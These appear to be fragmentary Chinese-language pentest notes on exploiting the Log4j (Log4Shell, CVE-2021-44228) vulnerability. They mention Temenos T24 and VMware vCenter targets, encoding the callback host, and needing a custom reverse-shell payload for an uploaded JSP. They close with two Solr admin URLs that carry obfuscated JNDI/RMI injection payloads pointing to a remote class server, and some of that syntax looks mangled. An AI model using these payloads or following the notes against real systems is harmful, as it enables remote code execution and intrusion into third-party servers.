log4j盲大全套.

log4j漏洞 Temenos T24 还没有找到目标测试 https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=featured.

这里可以考虑对host进行编码，避免明文传输.

log4j漏洞 当前能上传jsp，但是不能解析、执行，需要定制 reverse shell的 payload.

log4j漏洞 https://www.sprocketsecurity.com/resources/how-to-exploit-log4j-vulnerabilities-in-vmware-vcenter.

https://github.com/u21h2/nacs https://192.168.10.198/ui/#/login http://127.0.0.1:8983/solr/admin/cores?action=(){:;}{$:;$}{jndi:rmi${{::-:}}}//docker.for.mac.localhost:1099/UpX34defineClass} http://127.0.0.1:8983/solr/admin/cores?action=${jndi:${rmi://docker.for.mac.localhost:1099/UpX34defineClass}}.